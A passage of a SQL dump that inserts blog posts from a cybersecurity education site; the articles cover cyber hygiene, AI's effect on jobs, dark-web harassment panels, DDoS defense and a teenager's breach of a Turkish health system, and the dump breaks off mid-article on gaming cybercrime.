Is a Career, Not a Shortcut\n\nEntering the world of cybersecurity is a rewarding choice for those ready to commit to learning, growth, and long-term development. The path is neither quick nor easy, but it’s worth the effort. Remember:\n\n- Start with the basics—system administration, networking, and fundamental IT concepts.\n- Take time to master each step before moving to the next level.', '', 'http://infoseclabs.io/uploads/1769824512492-685283470.jpg', 'Person learning cybersecurity fundamentals on a laptop', 1, 'published', '2026-01-31 16:13:00', '2026-01-31 04:56:00', 'Information Security', 'Start Cybersecurity Career with Bootcamp Insights', 'Explore the truth about cybersecurity bootcamps, mastering IT fundamentals, and realistic career paths.', 'Cybersecurity Bootcamp'),
(39, 'The Basics of Cyber Hygiene: How to Stay Safe Online', 'the-basics-of-cyber-hygiene-how-to-stay-safe-online', '# Understanding Cyber Hygiene: Safeguarding Your Digital World\n\nThe internet is an integral part of daily life, powering everything from personal interactions to professional operations. However, this connectivity also comes with an increased risk of cyber threats. This is where **cyber hygiene** steps in—a fundamental practice to keep digital environments secure. Whether you\'re an IT professional or a small business owner looking to safeguard your online presence, understanding the basics of cyber hygiene is the first step toward a more secure digital future.\n\n## What is Cyber Hygiene and Why Is It Important?\n\nAt its core, cyber hygiene refers to a set of routine practices and measures designed to maintain the health and security of your online systems. Think of it as digital cleanliness—just as washing your hands prevents illness, maintaining proper cyber hygiene helps protect your devices, data, and networks from harmful threats.\n\nWithout good cyber hygiene, both individuals and organizations become vulnerable to attacks that can lead to financial loss, data breaches, reputational damage, and even legal consequences. For small business owners, one successful cyberattack could put your operations at risk. For individuals, your personal information could be exploited in ways that result in identity theft or fraud.\n\n## Common Cyber Threats to Watch Out For\n\nTo understand the importance of cyber hygiene, it\'s crucial to recognize some of the most pervasive cyber threats. Here’s a quick overview:\n\n- **Viruses and Malware**: Malicious software designed to disrupt, damage, or gain unauthorized access to systems.\n- **Phishing Attacks**: Fraudulent attempts to obtain sensitive information (like login credentials) by masquerading as trustworthy entities.\n- **Ransomware**: A type of malware that encrypts your files and demands payment in exchange for access.\n- **Data Breaches**: Unauthorized access to confidential data, often leading to financial and reputational damage.\n- **Spyware and Keyloggers**: Programs covertly collecting personal information or monitoring users’ activities.\n\nThese threats can affect anyone and highlight the need to adopt proactive measures through solid cyber hygiene practices.\n\n## Essential Cyber Hygiene Practices\n\nNow that we understand the risks, let\'s explore some foundational practices to enhance your cybersecurity:\n\n### 1. Use Strong Passwords and Manage Them Wisely\n\n- Create complex passwords using a mix of upper- and lowercase letters, numbers, and special characters.\n- Avoid using the same password for multiple accounts.\n- Use a password manager to store and generate secure passwords.\n\n### 2. Keep Software and Systems Updated\n\nCybercriminals often exploit vulnerabilities in outdated software. By installing updates and patches as soon as they\'re available, you close the door to potential exploits. This includes updating your operating system, web browsers, and any apps you use.\n\n### 3. Practice Secure Browsing\n\n- Ensure that websites you visit use HTTPS encryption (look for a padlock symbol in the browser’s address bar).\n- Avoid clicking on suspicious links or advertisements.\n- Clear your browser’s cache and history regularly to remove unnecessary data that may pose security risks.\n\n### 4. Maintain Regular Data Backups\n\nCreate backups of critical data and store them in secure locations—both on physical devices and cloud storage. Frequent backups ensure that you can recover your information in the event of a cyberattack or hardware failure.\n\n### 5. Enable Multi-Factor Authentication (MFA)\n\nAdding an extra authentication step, like an SMS code or fingerprint scan, makes it far harder for attackers to access your accounts, even if they have your password.\n\n## Implementing Cyber Hygiene in Daily Life\n\nHere’s how you can incorporate these practices into your daily online activities:\n\n- **At Home**:\n  - Secure your home network with a strong password and avoid using default credentials for routers.\n  - Educate all members of your household about recognizing phishing emails and suspicious links.\n  - Regularly scan your devices for malware using trusted antivirus software.\n\n- **At Work**:\n  - Implement an organization-wide password policy that mandates strong and unique passwords.\n  - Set up secure access controls to limit who can access sensitive information.\n  - Raise awareness among employees about the risks of cyber threats through training sessions.\n\nFor website administrators and small businesses, taking advantage of cybersecurity tools—such as firewalls, intrusion detection systems, and encrypted communication—can offer an additional layer of protection.\n\n## The Role of Education and Awareness in Cybersecurity\n\nOne of the most critical components of cyber hygiene is awareness. Cybersecurity is not a “set it and forget it” solution. Threats are constantly evolving, which means individuals and organizations must stay informed to remain secure.\n\n- Regularly educate your team on the latest cyber threats and how to avoid them.\n- Follow reputable cybersecurity blogs or news platforms to be aware of emerging risks.\n- Leverage training programs to instill a culture of security-conscious behavior.\n\n## Staying Ahead of Cyber Threats\n\nThe cybersecurity landscape is always changing, with new threats and vulnerabilities emerging every day. Maintaining up-to-date knowledge and evolving your cyber hygiene practices remains essential.\n\nHere are a few tips for staying ahead:\n\n- Participate in cybersecurity webinars and events to learn about industry best practices.\n- Review and update your cybersecurity policies and tools annually.\n- Invest in advanced security solutions that can detect and mitigate threats in real time.\n\nCyber hygiene is more than just a buzzword; it’s a non-negotiable strategy for anyone navigating the digital landscape. Whether you’re an IT professional managing enterprise systems or an individual browsing the internet at home, these essential practices can significantly reduce your risk of falling victim to cyberattacks.', '', 'http://infoseclabs.io/uploads/1773420050138-748854934.jpg', 'Illustration of cyber hygiene practices for online safety', 1, 'published', '2026-03-13 13:36:00', '2026-03-13 19:40:55', 'Information Security', 'Cyber Hygiene: Stay Safe Online', 'Learn essential cyber hygiene practices to protect your digital life from threats like malware and phishing.', 'cyber hygiene'),
(40, 'Is AI Saving or Taking Jobs? Exploring the Impact on Work and Cybersecurity', 'is-ai-saving-or-taking-jobs-exploring-the-impact-on-work-and-cybersecurity', '# The Impact of AI on Employment: Creating and Eliminating Jobs\n\nThe world is constantly evolving with technological advancements, and artificial intelligence (AI) is at the forefront of this transformation. However, as AI integrates into various industries, it raises an essential question: Will AI take jobs or create new ones? The definitive answer is yes—to both. AI is simultaneously eliminating certain positions while opening doors to new opportunities. Let\'s explore this dual impact by looking at historical precedents and understanding how modern applications like cybersecurity are shaping the future of work.\n\n## A Historical Perspective on Technology and Jobs\n\n### Agricultural Revolution to Industrialization\n\nHistorically, technological advancements have disrupted traditional jobs while creating new avenues for employment. For instance:\n\n- **Agriculture**: Before agricultural automation, most people worked in fields. With the advent of machinery like tractors, fewer hands were needed for farming, allowing individuals to explore other kinds of work.\n\n- **Factories**: Industrialization shifted workers from farms to factories. While automation ultimately streamlined factory processes, it also paved the way for jobs in sectors like engineering and mechanics.\n\n### The Information Age\n\nThe introduction of computers and the internet revolutionized industries, creating entirely new fields:\n\n- Careers in IT, cybersecurity, and software development emerged.\n\n- Automation allowed businesses to process data faster, leading to improved productivity and higher quality of life for many employees.\n\n### The Era of AI\n\nToday, we are in the age of artificial intelligence. Similar to previous advancements, AI is eliminating certain positions while giving rise to new, innovative roles. Understanding its impact requires examining how AI integrates into specific industries.\n\n## How AI Impacts Cybersecurity Jobs\n\nCybersecurity provides an excellent case study of AI\'s potential and limitations. While AI is streamlining many security processes, it also introduces new challenges. Here\'s a closer look:\n\n### Benefits of AI in Cybersecurity\n\nAI is proving to be a valuable ally for cybersecurity professionals by handling tasks that are repetitive, complex, or highly data-intensive. Some of its key applications include:\n\n1. **Automating Repetitive Tasks**\n   - **Code Reviews**: AI tools can quickly scan through lines of code to detect vulnerabilities.\n   - **Penetration Testing**: Automation in pen testing reduces the time required to identify system vulnerabilities, allowing for preemptive actions.\n\n2. **Summarizing and Analyzing Cases**\n   - **Case Summarization**: AI can condense weeks of incident notes into an executive summary, saving hours of manual effort.\n   - **Threat Hunting**: AI-driven models can hypothesize potential attacks and identify indicators of compromise, enhancing proactive threat detection.\n\n3. **Interpreting Complex Logs**\n   - AI models, including Large Language Models (LLMs), can analyze intricate log entries, such as SQL commands, and interpret their meaning, saving analysts hours of investigation.\n\n4. **Anomaly Detection**\n   - AI excels at spotting outliers in system behavior, such as unusual privilege escalations or suspicious activity patterns. It helps cybersecurity teams focus on high-priority threats.\n\n5. **Recommending Actions**\n   - When threats are detected, AI can suggest mitigation strategies or remediations, helping teams develop a faster, more efficient response.\n\n### Limitations and Risks of AI in Cybersecurity\n\nAI\'s impact is not solely positive; it also brings challenges:\n\n1. **Cybercriminal Automation**\n   - Bad actors are leveraging AI to automate reconnaissance, vulnerability scanning, and even social engineering schemes, making threats more sophisticated.\n\n2. **Dependence on Human Oversight**\n   - While AI automates numerous tasks, humans are still essential. Analysts must ask the right questions, creatively use the tools, and filter out noise or irrelevant data.\n\n3. **Ethical Concerns**\n   - Decisions made by AI models can have built-in biases, requiring careful monitoring and auditing by cybersecurity professionals.\n\n## AI’s Broader Implications for Jobs\n\nThe adoption of AI across industries inevitably leads to job displacement in certain fields. Still, as history illustrates, technological disruptions often create opportunities in the following ways:\n\n- **Emerging Roles**: New careers, such as AI trainers, data analysts, and machine learning engineers, are emerging as businesses race to adopt and manage artificial intelligence tools.\n\n- **Skill Requirements**: Traditional roles are evolving. For example, jobs in marketing or content creation increasingly demand familiarity with AI-powered platforms.\n\n- **Human-Machine Collaboration**: Rather than entirely replacing humans, AI often augments their abilities, allowing professionals to work more efficiently by focusing on higher-level tasks.\n\n## Key Takeaways for Businesses and Professionals\n\n1. **Adaptability is Crucial**\n   - Professionals should focus on developing skills that align with emerging AI-related roles, including data literacy, cybersecurity expertise, and creative abilities.\n\n2. **Upskilling and Reskilling**\n   - Organizations should invest in upskilling their workforce to improve their employees\' competency in working alongside AI systems.\n\n3. **Leveraging AI for Competitive Advantage**\n   - Companies that effectively integrate AI into their operations can achieve greater efficiency, reduced costs, and a competitive edge in their industry.\n\n## Final Thoughts\n\nArtificial intelligence is neither fully saving nor completely taking jobs—it is reshaping the workforce. Like the shifts prompted by industrialization and the advent of computers, AI is eliminating certain roles but creating others that are more innovative and often more impactful.\n\nOne thing is clear: staying agile and adopting AI thoughtfully will be critical for organizations and professionals alike. Whether you\'re a business leader exploring AI\'s potential or a professional looking to future-proof your career, understanding AI\'s evolving role in industries like cybersecurity can provide valuable insights into the future of work.', '', 'http://infoseclabs.io/uploads/1773544174022-318815997.jpg', 'Illustration of AI integration in workplace and cybersecurity', 1, 'published', '2026-03-14 06:46:00', '2026-03-15 06:09:42', 'Information Security', 'AI\'s Dual Impact: Job Creation & Cybersecurity', 'Explore how AI is reshaping jobs and enhancing cybersecurity. Is it saving or taking jobs? Find out the dual impact here.', 'AI and jobs'),
(41, 'Cyberbullying and Blackmail: The Dark Web’s Disturbing Business Model', 'cyberbullying-and-blackmail-the-dark-webs-disturbing-business-model', '# The Dark Web: A Breeding Ground for Cyberbullying and Blackmail\n\nBehind the veil of anonymity, the dark web has evolved into a breeding ground for malicious activities that harm individuals and society at large. Emerging trends in cybercrime reveal an alarming shift—cyberbullying and blackmail have turned into lucrative business models, thriving on stolen personal data to fulfill goals of harassment, manipulation, and exploitation.\n\nThis blog dives deep into how platforms on the dark web, such as Illegal City, Jax, and Next City, facilitate these campaigns, who benefits from these unethical practices, and the devastating impact they have on society. More crucially, it highlights the necessity for stricter regulations, enforcement, and individual vigilance.\n\n## The Dark Web\'s Role in Cyberbullying\n\nCyberbullying is no longer confined to social media platforms; it has found a profitable, malicious home on the dark web. Panels like Illegal City, Jax, and Next City operate as organized hubs for cyberbullying campaigns. These platforms provide services that enable users to launch harassment attacks with impunity.\n\n### The Mechanics of Cyberbullying Panels\n\nHere’s how these panels work:\n\n- **Fake Reports and False Claims** – Users can create fabricated reports to tarnish a victim’s reputation.\n- **Harassment Messages** – A simple click allows users to send threatening or humiliating messages en masse, spreading fear and ruining lives.\n- **Blackmail Services** – These platforms use stolen personal data to blackmail individuals, often targeting sensitive details or relationships.\n\nFor instance, one such panel allows users to input a victim\'s phone number and send malicious messages to their entire contact list. Imagine the dread and helplessness a victim might feel when their private life is mercilessly invaded at this scale.\n\n### Real-Life Example\n\nA cyberbullying incident involving a professional in the legal sector highlights the dark reality of these platforms. The victim’s stolen data was used to fabricate damaging claims, triggering a cascade of humiliating messages to colleagues and family members. The emotional impact left the victim contemplating resignation, fearing irreparable career damage.\n\n## Who Benefits From These Platforms?\n\nWhile victims bear the brunt of these attacks, an unsettling reality has emerged—certain parties are exploiting cyberbullying platforms for personal gain.\n\n### Unethical Practices by Lawyers and Politicians\n\nSome lawyers leverage dark web panels to intimidate opposing parties or extract favorable outcomes in legal disputes. Meanwhile, unethical politicians use cyberbullying and blackmail to silence critics or manipulate adversaries, tarnishing reputations to secure wins.\n\n### Real-Life Case Study\n\nConsider the recent case of a rising political candidate who became the victim of coordinated cyberattacks executed through a dark web panel. Stolen emails and private messages were manipulated into false narratives, circulated widely through harassment campaigns. Although these actions were later exposed, the long-term damage to the victim’s mental health and career was irreversible.\n\n## The Economic Model Behind Cyberbullying\n\nHow do these platforms profit? Stolen personal data serves as the fuel that powers their illegal operations. The growing demand for custom harassment and blackmail schemes has turned these panels into thriving businesses.\n\n### The Role of Stolen Data\n\nPersonal data theft provides a continuous supply of ammunition for these schemes. Full names, addresses, phone numbers, and even sensitive financial details are sold in bulk to perpetrators seeking to target specific victims.\n\n### Profitability of Custom Campaigns\n\nThe dark web thrives on anonymity, enabling buyers and operators to transact without fear of exposure. Panel operators charge premium rates for personalized harassment campaigns, extending services into niche areas like reputation damage, fake reviews, or character assassination.\n\n### Real-Life Example\n\nExample statistics revealed that a single targeted harassment campaign on a dark web panel could generate upwards of $5,000 for the perpetrators. When combined with the volume of similar orders across these platforms, it’s evident why cyberbullying has become a disturbingly profitable business vertical.\n\n## The Ripple Effect on Society\n\nThe harm caused by these platforms extends far beyond their immediate victims. Families, communities, and organizations feel the ripple effects when cyberbullying escalates unchecked.\n\n### Mental Health Consequences\n\nVictims of these attacks often suffer from anxiety, depression, and PTSD. Studies have shown that cyberbullying can increase the risk of suicide, especially among vulnerable populations like teenagers and young adults.\n\n### Breakdown of Trust\n\nWhen stolen data is weaponized for harassment or blackmail, it erodes trust in digital platforms and institutions designed to keep information secure. These attacks also strain families and communities as they grapple with the emotional toll and cumulative trauma inflicted on victims.\n\n### Real-Life Example\n\nThe story of a high school teacher targeted by cyberbullying serves as a stark lesson. After her personal information was stolen and published online, her students and colleagues received falsified messages claiming misconduct. The situation culminated in her temporary removal from teaching duties, further straining relationships with her students and peers.\n\n## What Can Be Done?\n\nThe fight against cyberbullying and blackmail on the dark web requires a collective effort from individuals, policymakers, and cybersecurity experts.\n\n### Stricter Regulations and Penalties\n\nGovernments must impose stringent laws targeting the operators behind these panels. Punishments should extend to those who purchase services from such platforms to deter demand. Collaboration between international authorities is critical to dismantling the infrastructure these panels rely on.\n\n### Actions for Cybersecurity Experts\n\n- **Monitoring Threat Patterns** – AI algorithms can help trace suspicious activity early in the process to identify trends and shut down dark web operations.\n- **Public Awareness Campaigns** – Cybersecurity organizations play a vital role in educating people about the risks of data theft and how to safeguard personal information.\n\n### Recommendations for Individuals\n\n- Use strong, unique passwords for all online accounts to prevent data breaches.\n- Enable two-factor authentication to add an extra layer of security.\n- Regularly monitor your digital footprint to identify and address vulnerabilities.\n\n## We Must Act to Curb the Threat\n\nThe rise of cyberbullying and blackmail as a business model on the dark web is a sobering reality. It preys on stolen personal data, causing immense harm to individuals and communities while enriching unscrupulous operators. The emotional toll, mental health impacts, and societal breakdowns underscore the urgent need to address this issue.\n\nIt’s time for all of us—whether tech enthusiasts, cybersecurity experts, educators, or policymakers—to step up and take action. Advocate for stricter regulations. Educate yourself and others on cybersecurity best practices. Together, we can work toward a safer, more secure digital landscape for all.', '', 'http://infoseclabs.io/uploads/1773600451252-551323039.jpg', 'Illustration of dark web activities involving cyberbullying and blackmail', 1, 'published', '2025-03-05 21:53:00', '2026-03-15 21:47:53', 'Cyber Kids', 'Cyberbullying & Blackmail: Dark Web\'s Business', 'Explore how cyberbullying and blackmail thrive on the dark web, impacting lives and urging for stricter regulations.', 'Cyberbullying blackmail'),
(42, 'DDoS Attacks Explained: How to Protect Your Business Online', 'how-to-protect-your-website-from-ddos-attacks', '# Understanding and Defending Against DDoS Attacks\n\nWith the rise of internet dependency, the risk of cyberattacks continues to grow. Among the most disruptive are Distributed Denial of Service (DDoS) attacks, which can incapacitate even well-prepared websites. Whether you are an IT security expert, a small business owner, or a cybersecurity enthusiast, understanding and defending against DDoS attacks is critical to safeguarding your online assets.\n\n## What is a DDoS Attack, and How Can It Impact Websites?\n\nA Distributed Denial of Service (DDoS) attack is a malicious attempt to make a website or online service unavailable by overwhelming it with a flood of traffic. This traffic does not come from legitimate users but from compromised devices, often part of a botnet (a network of infected devices).\n\nThe impact of a successful DDoS attack can be devastating. For businesses, it may result in lost revenue, damaged reputation, and reduced customer trust. Non-profits and social organizations may lose critical access to their platforms during peak activity. Downtime caused by DDoS can also lead to long-term damage, including SEO penalties that further reduce the accessibility of the website.\n\n## Why Do DDoS Attacks Target Various Websites?\n\nDDoS attacks don\'t just target large corporations or high-profile organizations—they impact websites of all sizes and industries. Here’s why:\n\n- **Small Businesses**: Often targeted due to their typically weaker defenses compared to larger enterprises.\n- **Non-Profits**: May face attacks aimed at silencing their advocacy work or disrupting critical fundraising campaigns.\n- **Media and E-commerce Sites**: Attractive targets because downtime translates to significant revenue losses.\n\nUnderstanding this broad target range highlights the importance of proactive measures for every type of website.\n\n## Types of DDoS Attacks\n\nNot all DDoS attacks are created equal. Here’s a breakdown of the most common types:\n\n1. **Volumetric Attacks**: These are the most common type of DDoS attacks, aiming to overwhelm the bandwidth of your site by sending massive amounts of data traffic.\n\n2. **Protocol Attacks**: Designed to exploit weaknesses in network protocols, these attacks target servers and firewalls to exhaust their resources. Examples include SYN floods and Ping of Death attacks.\n\n3. **Application Layer Attacks**: Often harder to detect, these attacks focus on the application layer (e.g., HTTP, HTTPS). They simulate legitimate user activity, making them particularly damaging.\n\nUnderstanding these categories can help you identify and respond to attacks more effectively.\n\n## Signs That Your Website is Under a DDoS Attack\n\nDetecting a DDoS attack quickly is critical to reducing its impact. Here are indicators that your website might be under attack:\n\n- **Unusual Traffic Spikes**: A sudden and relentless flood of traffic, especially from suspicious or unknown IP addresses.\n\n- **Slow Server Performance**: If your website becomes noticeably slower or starts to time out, your server might be overwhelmed by illegitimate traffic.\n\n- **Frequent Crashes or Error Messages**: Repeated disruptions or \"Service Unavailable\" errors can signal that your systems are under strain.\n\nUsing real-time analytics tools, such as Google Analytics or server monitoring solutions, can help you monitor website performance and spot irregularities.\n\n## Best Practices for Protecting Your Website from DDoS Attacks\n\nPreventing DDoS attacks requires a combination of proactive measures and responsive strategies. Here’s what you can do:\n\n1. **Strengthen Network and Server Security**: \n   - Use firewalls and intrusion detection systems to identify and block malicious traffic.\n   - Regularly update your software to patch vulnerabilities that attackers may exploit.\n\n2. **Leverage DDoS Protection Services**: Providers like Cloudflare and Akamai specialize in offering services that detect and automatically mitigate DDoS threats before they reach your site.\n\n3. **Create a DDoS Response Plan**: Ensure your business has a documented plan with steps for identifying and addressing an attack. Train your team to execute this plan efficiently.\n\n4. **Use Load Balancers to Spread Traffic**: Distributing your website\'s traffic across multiple servers can reduce the strain caused by a DDoS attack.\n\n5. **Monitor for Abnormal Traffic**: Keep an eye on analytics to recognize and act on any unusual traffic patterns.\n\nBy implementing these strategies, you can significantly reduce the risk of DDoS-related downtime.\n\n## Case Studies of Websites that Defended Against DDoS Attacks\n\n- **GitHub’s Defense Against a Record-Breaking DDoS Attack**: GitHub successfully mitigated a 1.35 terabits per second (Tbps) DDoS attack in 2018 by relying on a robust web traffic filtering system and a dedicated DDoS mitigation service.\n\n- **Krebs on Security**: After facing a massive DDoS attack, the blog moved to a specialized protection service, which helped neutralize future threats.\n\nThese examples show that preparation and the use of the right tools can make all the difference.\n\n## Future Trends in DDoS Attacks and Evolving Defenses\n\nThe landscape of DDoS threats is continually evolving. Some emerging trends to watch out for include:\n\n- **IoT Device Exploitation**: Internet of Things (IoT) devices are increasingly used in botnets due to their often unpatched vulnerabilities.\n\n- **Amplified Volumetric Attacks**: Attackers are finding new techniques to multiply their traffic, making defenses harder.\n\n- **AI-Driven Mitigation**: The future of DDoS defense lies in AI and machine learning, which can analyze threats and adapt defenses in real-time to minimize the damage.\n\n## Be Proactive, Stay Protected\n\nKeeping your website safe from DDoS attacks isn’t just about using the right tools. It\'s about being proactive, staying informed, and continually adapting to new threats. By following best practices and leveraging advanced technologies, you can protect your online assets and maintain trust with your users.', '', 'http://infoseclabs.io/uploads/1773600729389-664744418.jpg', 'Website defense against DDoS attacks with cybersecurity shield', 1, 'published', '2025-02-15 13:26:00', '2026-03-15 21:52:13', 'Information Security', 'Protect Your Website from DDoS Attacks', 'Learn how to safeguard your site from DDoS attacks and protect against traffic overload, loss, and downtime.', 'DDoS protection'),
(43, 'The Young Hacker Who Breached a Government System: Lessons for Aspiring Cybersecurity Enthusiasts', 'the-young-hacker-who-breached-a-government-system-lessons-for-aspiring-cybersecurity-enthusiasts', '# Understanding the Impact of Cybersecurity Breaches\n\nWith technology at the core of our daily lives, we often overlook how small—almost invisible—vulnerabilities can lead to catastrophic security breaches. A particularly notable case highlights this reality vividly. A 15-year-old from Adana successfully breached Turkey’s government system, stealing data for 101 million citizens. This real-world incident serves as a wake-up call for aspiring cybersecurity professionals, underscoring the importance of understanding vulnerabilities and safeguarding systems against evolving threats.\n\nFor those interested in cybersecurity, this isn\'t just a cautionary tale—it’s an opportunity to learn how key measures like two-step verification and artificial intelligence systems can protect, or in this case, fail to protect digital infrastructures. Here’s a detailed breakdown of what happened and the valuable insights this incident offers.\n\n## The Adana Cyber Breach Demystified\n\nOn August 24, 2022, a 15-year-old from Adana gained unauthorized access to Turkey’s Public Health Management System (HSYS), a pivotal system for managing health records and initiatives. It was more than a conventional cyberattack; the breach resulted from exploiting a weak spot in the two-step verification system of the HSYS.\n\nTwo-step verification is designed to provide an additional layer of security, yet this system’s loophole allowed unauthorized access. The hacker didn’t stop there—using cutting-edge AI tools, he automated the extraction of sensitive personal data belonging to over 101 million citizens. While this demonstrates technical prowess, it also sets a dire precedent for the risks associated with the misuse of technology.\n\nFor cybersecurity learners, this incident highlights the importance of understanding and addressing vulnerabilities in even the most secure systems.\n\n## Hacking Techniques and Lessons for Learners\n\nThe methods employed in this breach reveal both the sophistication of modern cyberattacks and the ethical responsibility that accompanies learning such techniques. Here’s a deeper look at how the attack unfolded:\n\n### Exploiting Two-Step Verification\n\nTwo-step verification is a widely adopted practice requiring two forms of authentication before granting access. Despite being considered highly secure, the hacker identified a vulnerability in the HSYS that bypassed this critical layer effortlessly. Once inside, the real attack began.\n\n### Leveraging AI for Automation\n\nThe hacker deployed AI-powered tools to extract sensitive information on an unprecedented scale. Using machine learning algorithms, these tools automated data extraction and processing. For cybersecurity enthusiasts, this raises a critical question—how can cutting-edge AI be protected against misuse? Understanding how algorithms work and how attackers may exploit them is a fundamental skill for anyone entering this field.\n\n### Key Takeaway for Aspiring Cybersecurity Professionals\n\nThe challenge lies not just in fortifying systems but in adopting proactive approaches to uncover and patch vulnerabilities before they’re exploited. Aspiring cybersecurity learners should consider specialized training in system penetration testing, ethical hacking, and AI-driven security analysis. These skills are essential for protecting systems against increasingly sophisticated attacks.\n\n## Why This Breach Matters—Real-World Consequences\n\nThe ripple effects of this breach extend far beyond the stolen data itself. Understanding these consequences is critical for cybersecurity professionals working to foresee and mitigate the potential impacts of malicious attacks.\n\n- **Cyberbullying and Blackmail:** After the data was stolen, it became a weapon for ill intent, including blackmail and cyberbullying. Affected citizens faced emotional and financial harm, reinforcing the stakes of strong digital security.\n- **Organized Crime:** The stolen records facilitated organized crime, with cybercriminals using the breached data to fuel illegal activities. This demonstrates how a single cybersecurity lapse can feed into larger criminal networks.\n- **Global Implications:** Governments and enterprises worldwide are now questioning the integrity of their systems. This incident reveals that even industries considered secure—such as public health—are vulnerable to exploitation.\n\nFor learners and professionals in cybersecurity, incidents like this underscore the profound implications of weak security measures and the vital need to stay ahead of cybercriminal tactics.\n\n## Strengthening Cybersecurity for a Safer Future\n\nWhat can we do to avert similar breaches in the future? This incident provides a roadmap for cybersecurity learners to prioritize the following areas:\n\n1. **Vulnerability Assessment:** Conduct frequent system penetration tests to identify loopholes. Specialized knowledge in vulnerability scanning tools can be a game-changer.\n2. **AI-Driven Defense Mechanisms:** While AI technologies can be exploited, they can also protect systems. Aspiring cybersecurity professionals should explore AI-powered security tools that detect and mitigate threats in real time.\n3. **Rigorous Authentication Protocols:** Improve authentication systems to resist exploitation. Enhancing multi-factor authentication methods with biometrics or hardware keys can significantly reduce risks.\n4. **Continuous Learning:** The field of cybersecurity is fast-evolving. Courses in ethical hacking, AI security, and threat intelligence should be part of every learner’s roadmap.\n\nBy adopting these strategies and committing to continuous education, today’s learners can become tomorrow’s defenders of digital systems.\n\n## A Call to Aspiring Cybersecurity Professionals\n\nThe Adana cyber breach isn’t just an incident—it’s a pivotal lesson in the dynamic and demanding field of cybersecurity. It offers valuable insights for those passionate about securing digital infrastructures, fostering ethical AI development, and staying ahead of malicious actors.\n\nFor aspiring professionals, this case reiterates the importance of vigilance, innovation, and ethical responsibility. The global demand for skilled cybersecurity experts has never been greater. Whether you’re just starting or looking to deepen your expertise, now is the time to equip yourself with the skills and knowledge needed to tackle tomorrow’s threats.\n\n## Turning Lessons Into Action\n\nThe story of the Adana 15-year-old is a stark reminder that technology, while a powerful tool, is also a potential liability when left unchecked. For cybersecurity enthusiasts, this isn’t just a story of what went wrong—it’s a call to action to stay ahead of innovative attackers.\n\nTo those eager to make a positive impact, there’s no better time to start building your skills in cybersecurity. Take note of the lessons from this breach, learn from it, and play your part in creating a safer digital world for everyone.\n\n**Interested in learning more about cybersecurity? Start by exploring hands-on ethical hacking courses and vulnerability assessment tools today. The future of cybersecurity depends on bold thinkers like you.**', '', 'http://infoseclabs.io/uploads/1773601268603-974267264.jpg', 'Teenage hacker breaching government cybersecurity system', 1, 'published', '2025-02-10 15:10:00', '2026-03-15 22:03:53', 'History', 'Young Hacker Breaches Gov System: Cybersecurity Lessons', 'Discover how a 15-year-old hacked a government system and learn key cybersecurity lessons for aspiring professionals.', 'cybersecurity lessons');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(44, 'The Dark Side of Gaming: How Virtual Worlds Are Fuels for Cybercrime', 'the-dark-side-of-gaming-how-virtual-worlds-are-fuels-for-cybercrime', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When the world turned to virtual entertainment for solace during the COVID-19 pandemic, another global phenomenon quietly unfolded—online gaming platforms became fertile ground for cybercriminal activity. With millions of new users joining virtual worlds and spending unprecedented amounts of time on these platforms, the gaming community became a microcosm of real cities, complete with thriving communities—yet also rife with risk. From breaches of personal data to bullying and criminal exploitation, gaming\'s darker side deserves attention now more than ever.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">A Turning Point for Online Gaming</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">2020 marked a colossal shift in the realm of online gaming. Locked in their homes due to pandemic restrictions, millions turned to virtual worlds like <b><strong class=\"font-bold\">Minecraft</strong></b>, <b><strong class=\"font-bold\">Roblox</strong></b>, and other multiplayer games as a way to connect, socialize, and escape. Initially, these immersive experiences offered a safe haven amid global uncertainties. But as platforms grew more popular, their unregulated nature and vast digital landscapes began to attract malicious actors.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Beyond casual gameplay, game servers evolved into dynamic ecosystems. Players assumed real-world roles such as police officers, traders, and landlords, mirroring the structure of bustling cities. Unfortunately, like in the real world, these virtual cities witnessed the rise of criminal behaviors. Where players once gathered for cooperation and creativity, cyberbullying, hacking, and data theft began to unfold.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybercrimes in the Gaming Universe</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Virtual worlds, by their very nature, encourage anonymity—a feature beloved by gamers but exploited by cybercriminals. Some of the common cybercrimes happening within online gaming ecosystems include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Identity Theft and Data Breaches</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Gaming servers often lure players into sharing personal information, whether during user registration or through in-game interactions. It\'s alarmingly easy for cybercriminals to use this data as a weapon, stealing identities or misusing stolen credentials for nefarious purposes.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Example</em></i>: Imagine a cheater’s personal data being leaked onto a server and malicious players taking advantage of this to commit further crimes.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Bullying and Harassment</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Seemingly innocent gaming platforms can quickly become hostile for players, especially teenagers. Bullies take 